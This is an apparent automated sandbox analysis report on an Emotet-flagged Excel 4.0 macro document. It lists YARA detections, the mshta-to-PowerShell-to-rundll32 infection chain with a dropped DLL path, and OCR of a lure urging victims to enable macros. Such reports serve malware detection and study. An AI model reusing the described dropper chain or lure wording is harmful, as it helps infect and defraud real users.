                            Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 17.2.rundll32.exe.27d0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.25b0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3090000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2880000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.880000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2db0000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2760000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.860000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a90000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2e10000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2db0000.19.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e80000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.7d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.d80000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e50000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2eb0000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2db0000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.29a0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2800000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b30000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e50000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.c20000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.730000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2900000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.600000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2900000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2fc0000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.860000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2800000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.29a0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.ce0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27d0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e40000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2800000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27d0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2fc0000.24.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e90000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b00000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.28d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d50000.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a90000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.28d0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e40000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2eb0000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d80000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.830000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d10000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3030000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2cf0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3060000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.7d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2830000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d50000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b30000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2830000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26d0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2400000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.26a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.ce0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d10000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ee0000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2400000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.31.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2db0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\Milossd.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: DOCUMENT_2801.xlsMacro extractor: Sheet: Macro3 contains: mshta
                            Source: DOCUMENT_2801.xlsMacro extractor: Sheet: Macro3 contains: mshta
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 Previewing is not available for protected documents. 14 15 Yo
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23
                            Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 ,, Previewing is not available for protected documents. L, 14
                            Source: Screenshot number: 8Screenshot OCR: protected documents. L, 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to
                            Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. :: 18 19 20 21 22 23 24 25 26 27 28 2
                            Document contains OLE streams with names of living off the land binaries
                            Source: DOCUMENT_2801.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .......
                            Source: DOCUMENT_2801.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .......
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Milossd.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: DOCUMENT_2801.xlsInitial sample: EXEC
                            Source: DOCUMENT_2801.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B9700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C5CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002C5040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B6083
